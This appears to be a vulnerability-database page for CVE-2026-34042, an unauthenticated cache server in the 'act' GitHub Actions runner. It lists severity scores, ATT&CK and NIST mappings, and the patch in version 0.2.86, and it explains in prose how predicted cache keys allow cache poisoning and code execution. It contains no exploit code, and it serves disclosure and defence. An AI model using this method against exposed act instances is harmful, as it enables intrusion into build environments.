Cyber Resilience

CVE-2026-34042

High

Published: 31 March 2026

Published
31 March 2026
Modified
16 April 2026
KEV Added
Patch
CVSS Score v3.1 8.2 CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score 0.0046 36.4th percentile
Risk Priority 55 floored blend · peak EPSS

Summary

CVE-2026-34042 is a high-severity Missing Authorization (CWE-862) vulnerability in Forgejo (inferred from references). Its CVSS base score is 8.2 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 36.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and CM-7 (Least Functionality).

Deeper analysis

CVE-2026-34042 affects the "act" project, an open-source tool for running GitHub Actions locally. In versions prior to 0.2.86, the built-in actions/cache server listens for connections on all network interfaces, exposing it to unauthorized access. This misconfiguration (related to CWE-862: Missing Authorization) enables remote parties to create caches with arbitrary keys and retrieve all existing caches without authentication.

A remote attacker with network access to the vulnerable act instance can exploit this by connecting to the cache server, even from the internet. By predicting cache keys used by local GitHub Actions workflows, the attacker can upload malicious cache files. When act's local actions subsequently use these poisoned caches, it can lead to arbitrary remote code execution within the Docker container running the actions, as indicated by the CVSS 3.1 score of 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N), which requires some user interaction such as triggering the affected workflow.

The vulnerability has been patched in act version 0.2.86, as detailed in the project's GitHub security advisory (GHSA-x34h-54cw-9825), the patching commit (c28c27e141e8b54f9853de82f421ee09846751f7), and the release notes. Security practitioners should upgrade to v0.2.86 or later and review Forgejo runner issue #294 for additional context on related discussions.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

act is a project which allows for local running of github actions. Prior to version 0.2.86, act's built in actions/cache server listens to connections on all interfaces and allows anyone who can connect to it including someone anywhere on the…

more

internet to create caches with arbitrary keys and retrieve all existing caches. If they can predict which cache keys will be used by local actions, they can create malicious caches containing whatever files they please most likely allowing arbitrary remote code execution within the docker container. This issue has been patched in version 0.2.86.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

The vulnerability exposes an unauthenticated cache server on all interfaces (CWE-862), directly enabling remote exploitation for cache poisoning and subsequent RCE, mapping to T1190 Exploit Public-Facing Application.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-69311Shared CWE-862
CVE-2026-3266Shared CWE-862
CVE-2026-45438Shared CWE-862
CVE-2025-23477Shared CWE-862
CVE-2025-68834Shared CWE-862
CVE-2026-22663Shared CWE-862
CVE-2024-12544Shared CWE-862
CVE-2024-50967Shared CWE-862
CVE-2025-68059Shared CWE-862
CVE-2025-14070Shared CWE-862

Affected Assets

Forgejo
inferred from references and description; NVD did not file a CPE for this CVE

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Establishes and enforces secure configuration settings for the act cache server to bind only to localhost, directly preventing exposure to remote unauthorized access.

prevent

Restricts the act tool to least functionality by prohibiting or limiting the network-listening capability of the built-in cache server, eliminating unnecessary exposure.

prevent

Implements boundary protection such as host-based firewalls to block unauthorized network access to the act cache server port, mitigating remote exploitation even if misconfigured.

References